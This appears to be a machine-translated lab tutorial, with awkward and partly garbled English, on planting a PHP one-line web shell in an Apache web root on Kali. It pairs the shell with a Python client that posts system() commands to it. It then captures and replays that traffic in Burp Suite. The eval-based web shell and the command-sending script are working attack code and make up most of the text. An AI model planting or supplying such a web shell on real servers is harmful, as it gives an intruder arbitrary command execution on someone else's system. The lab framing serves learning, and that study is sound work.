Kali Already there are Apache 了 , stay /etc Under the table of contents ls It will be displayed , So just configure it .( Use other here Linux or Windows Any virtual machine )
open apache Service related commands
/etc/init.d/apache2 start ( Turn on )
/etc/init.d/apache2 restart ( restart )
/etc/init.d/apache2 status ( Check the status )
Here it is Kali Enter Kali Of IP, It can be found that... Has been started apache.
stay Kali Of web Write a one sentence Trojan horse in the root directory , Here is to use PHP The Trojan horse .
<?php @eval($_POST['shell']);?>
shell Variable is used to receive python The string passed by the code .
eval() The function executes the received string as a command .
import requests
url = str(input(' The goal is URL:'))
passwd = str(input(' Connect the password :')) # In fact, it is a variable in the Trojan horse shell
cmd = str(input(' Carry out orders :'))
# Pass the command to the one sentence Trojan horse
payload = {
passwd: "system(\'" + cmd + "\');"
}
# To the goal url send out post request
response = requests.post(url=url, data=payload, timeout=3)
# Echo the results of command execution
print(response.text)
import requests
url = str(input(' The goal is URL:'))
passwd = str(input(' Connect the password :')) # In fact, it is a variable in the Trojan horse shell
cmd = str(input(' Carry out orders :'))
# Pass the command to the one sentence Trojan horse
payload = {
passwd: "system(\'" + cmd + "\');"
}
# Use burpsuite Yes python Of post Please grab the bag
proxy = {
'http': '127.0.0.1:8080',
'https': '127.0.0.1:8080'
}
# To the goal url send out post request
response = requests.post(url=url, data=payload, proxies=proxy, timeout=3)
# Echo the results of command execution
print(response.text)
Turn on burpsuite Grab the bag , function python Code .
Replay this post request .
Use burpsuite The built-in tool decodes
After decoding , give the result as follows .
take ls The order was changed to ifconfig command , give the result as follows .